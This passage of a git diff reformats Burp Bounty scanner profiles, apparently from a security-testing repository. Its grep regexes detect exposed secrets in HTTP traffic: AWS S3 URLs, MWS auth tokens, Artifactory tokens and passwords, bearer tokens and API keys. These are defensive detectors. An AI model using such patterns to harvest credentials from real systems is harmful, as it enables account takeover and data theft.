"payloadsFile": "", + "grepsFile": "", + "IssueName": "AmazonAWS", + "IssueSeverity": "Information", + "IssueConfidence": "Firm", + "IssueDetail": "Amazon AWS found: \u003cbr\u003e\u003cgrep\u003e", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/AmazonAWSRequest.bb b/profiles/AmazonAWSRequest.bb index 09b5868..1deb56e 100755 --- a/profiles/AmazonAWSRequest.bb +++ b/profiles/AmazonAWSRequest.bb @@ -1 +1,59 @@ -[{"Name":"AmazonAWSRequest","Enabled":true,"Scanner":3,"Author":"@egarme","UrlEncode":false,"Grep":["true,Or,All Request,Name,s3..*amazonaws.com"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"NegativeCT":false,"IsResponseCode":false,"NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"AmazonAWS","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Amazon AWS found: \u003cbr\u003e\u003cgrep\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "AmazonAWSRequest", + "Name": "", + "Enabled": true, + "Scanner": 3, + "Author": "@egarme", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,All Request,Name,s3..*amazonaws.com" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 0, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "AmazonAWS", + "IssueSeverity": "Information", + "IssueConfidence": "Firm", + "IssueDetail": "Amazon AWS found: \u003cbr\u003e\u003cgrep\u003e", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Amazon_AWS_S3_Url.bb b/profiles/Amazon_AWS_S3_Url.bb old mode 100644 new mode 100755 index 45cf44d..5d9ab38 --- a/profiles/Amazon_AWS_S3_Url.bb +++ b/profiles/Amazon_AWS_S3_Url.bb @@ -1 +1,64 @@ -[{"Name":"Amazon_AWS_S3_Url","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,[a-zA-Z0-9-\\.\\_]+\\.s3\\.amazonaws\\.com","true,Or,s3:\\/\\/[a-zA-Z0-9-\\.\\_]+","true,Or,s3.amazonaws.com\\/[a-zA-Z0-9-\\.\\_]+","true,Or,s3.console.aws.amazon.com\\/s3\\/buckets\\/[a-zA-Z0-9-\\.\\_]+","true,Or,s3\\\\.amazonaws.com[/]+|[a-zA-Z0-9_-]*\\\\.s3\\\\.amazonaws.com"],"Tags":["Cloud","All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"AWS Url Detected","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Amazon_AWS_S3_Url", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,[a-zA-Z0-9-\\.\\_]+\\.s3\\.amazonaws\\.com", + "true,Or,s3:\\/\\/[a-zA-Z0-9-\\.\\_]+", + "true,Or,s3.amazonaws.com\\/[a-zA-Z0-9-\\.\\_]+", + "true,Or,s3.console.aws.amazon.com\\/s3\\/buckets\\/[a-zA-Z0-9-\\.\\_]+", + "true,Or,s3\\\\.amazonaws.com[/]+|[a-zA-Z0-9_-]*\\\\.s3\\\\.amazonaws.com" + ], + "Tags": [ + "Cloud", + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "AWS Url Detected", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Amazon_MWS_Auth_Token.bb b/profiles/Amazon_MWS_Auth_Token.bb old mode 100644 new mode 100755 index be9f675..479a34f --- a/profiles/Amazon_MWS_Auth_Token.bb +++ b/profiles/Amazon_MWS_Auth_Token.bb @@ -1 +1,59 @@ -[{"Name":"Amazon_MWS_Auth_Token","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,amzn\\\\.mws\\\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Amazon MWS url found","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"Amazon MWS url found","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Amazon_MWS_Auth_Token", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,amzn\\\\.mws\\\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Amazon MWS url found", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "Amazon MWS url found", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Android_WebView_JS.bb b/profiles/Android_WebView_JS.bb old mode 100644 new mode 100755 index 634ecc9..631b25e --- a/profiles/Android_WebView_JS.bb +++ b/profiles/Android_WebView_JS.bb @@ -1 +1,60 @@ -[{"Name":"Android_WebView_JS","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,setJavaScriptEnabled\\(true\\)"],"Tags":["All","Mobile"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Possible Android Webview JS enabled","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"Possible Android Webview JS enabled","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Android_WebView_JS", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,setJavaScriptEnabled\\(true\\)" + ], + "Tags": [ + "All", + "Mobile" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Possible Android Webview JS enabled", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "Possible Android Webview JS enabled", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/ApiKeyRequest.bb b/profiles/ApiKeyRequest.bb old mode 100644 new mode 100755 index a50a706..651c246 --- a/profiles/ApiKeyRequest.bb +++ b/profiles/ApiKeyRequest.bb @@ -1 +1,63 @@ -[{"Name":"ApiKeyRequest","Enabled":true,"Scanner":3,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["api_key","api-key","api key","apikey"],"Tags":["API"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"ApiKeyRequest","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Api Key found","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "ApiKeyRequest", + "Name": "", + "Enabled": true, + "Scanner": 3, + "Author": "@egarme", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,All Request,Value,api_key", + "true,Or,All Request,Value,api-key", + "true,Or,All Request,Value,api key", + "true,Or,All Request,Value,apikey" + ], + "Tags": [ + "API", + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 0, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "ApiKeyRequest", + "IssueSeverity": "Information", + "IssueConfidence": "Firm", + "IssueDetail": "Api Key found", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/ApiKeyResponse.bb b/profiles/ApiKeyResponse.bb new file mode 100755 index 0000000..05b60b0 --- /dev/null +++ b/profiles/ApiKeyResponse.bb @@ -0,0 +1,62 @@ +[ + { + "ProfileName": "ApiKeyResponse", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@egarme", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,api_key", + "true,Or,api-key", + "true,Or,api key", + "true,Or,apikey" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "ApiKeyResponse", + "IssueSeverity": "Information", + "IssueConfidence": "Firm", + "IssueDetail": "Api Key found", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/ApiPath.bb b/profiles/ApiPath.bb old mode 100644 new mode 100755 index e8b2d9b..6e98055 --- a/profiles/ApiPath.bb +++ b/profiles/ApiPath.bb @@ -1 +1,61 @@ -[{"Name":"ApiPath","Enabled":true,"Scanner":3,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["/api/","internal_api"],"Tags":["API"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"ApiPath","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Api Path found","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "ApiPath", + "Name": "", + "Enabled": true, + "Scanner": 3, + "Author": "@egarme", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,All Request,Value,/api/", + "true,Or,All Request,Value,/internal_api" + ], + "Tags": [ + "API", + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 0, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "ApiPath", + "IssueSeverity": "Information", + "IssueConfidence": "Firm", + "IssueDetail": "Api Path found", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Artifactory_API_Token.bb b/profiles/Artifactory_API_Token.bb old mode 100644 new mode 100755 index 88fbcf8..44615a5 --- a/profiles/Artifactory_API_Token.bb +++ b/profiles/Artifactory_API_Token.bb @@ -1 +1,59 @@ -[{"Name":"Artifactory_API_Token","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(?:\\s|\u003d|:|\"|^)AKC[a-zA-Z0-9]{10,}"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Artifactory API Token","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Artifactory_API_Token", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,(?:\\s|\u003d|:|\"|^)AKC[a-zA-Z0-9]{10,}" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Artifactory API Token", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Artifactory_Password.bb b/profiles/Artifactory_Password.bb old mode 100644 new mode 100755 index 3c18843..75e8f29 --- a/profiles/Artifactory_Password.bb +++ b/profiles/Artifactory_Password.bb @@ -1 +1,59 @@ -[{"Name":"Artifactory_Password","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(?:\\s|\u003d|:|\"|^)AP[\\dABCDEF][a-zA-Z0-9]{8,}"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Artifactory Password","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Artifactory_Password", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,(?:\\s|\u003d|:|\"|^)AP[\\dABCDEF][a-zA-Z0-9]{8,}" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Artifactory Password", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/AuthorizationBearerToken.bb b/profiles/AuthorizationBearerToken.bb old mode 100644 new mode 100755 index 6a13cf7..d95e466 --- a/profiles/AuthorizationBearerToken.bb +++ b/profiles/AuthorizationBearerToken.bb @@ -1 +1,60 @@ -[{"Name":"AuthorizationBearerToken","Enabled":true,"Scanner":3,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["Authorization: Bearer"],"Tags":["JWT"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"AuthorizationBearerToken","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Authorization Bearer Token Found","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "AuthorizationBearerToken", + "Name": "", + "Enabled": true, + "Scanner": 3, + "Author": "@egarme", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,All Request,Value,Authorization: Bearer" + ], + "Tags": [ + "JWT", + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 0, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "AuthorizationBearerToken", + "IssueSeverity": "Information", + "IssueConfidence": "Firm", + "IssueDetail": "Authorization Bearer Token Found", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Authorization_Bearer.bb b/profiles/Authorization_Bearer.bb old mode 100644 new mode 100755 index a350c34..62c4b75 --- a/profiles/Authorization_Bearer.bb +++ b/profiles/Authorization_Bearer.bb @@ -1 +1,59 @@ -[{"Name":"Authorization_Bearer","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,bearer\\s*[a-zA-Z0-9_\\-\\.\u003d:_\\+\\/]+"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2,application/javascript","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Authorization Bearer","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"Authorization Bearer","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Authorization_Bearer", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,bearer\\s*[a-zA-Z0-9_\\-\\.\u003d:_\\+\\/]+" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2,application/javascript", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Authorization Bearer", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "Authorization Bearer", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Azure_Blob_Discovered.bb b/profiles/Azure_Blob_Discovered.bb old mode 100644 new mode 100755 index 60f8382..66a5e4c --- a/profiles/Azure_Blob_Discovered.bb +++ b/profiles/Azure_Blob_Discovered.bb @@ -1 +1,60 @@ -[{"Name":"Azure_Blob_Discovered","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,http(?:s):\\/\\/.[^\u003e\u003c\\\u0027\\\" \\n\\)]+.blob.core.windows.net\\/.[^\u003e\u003c\\\u0027\\\" 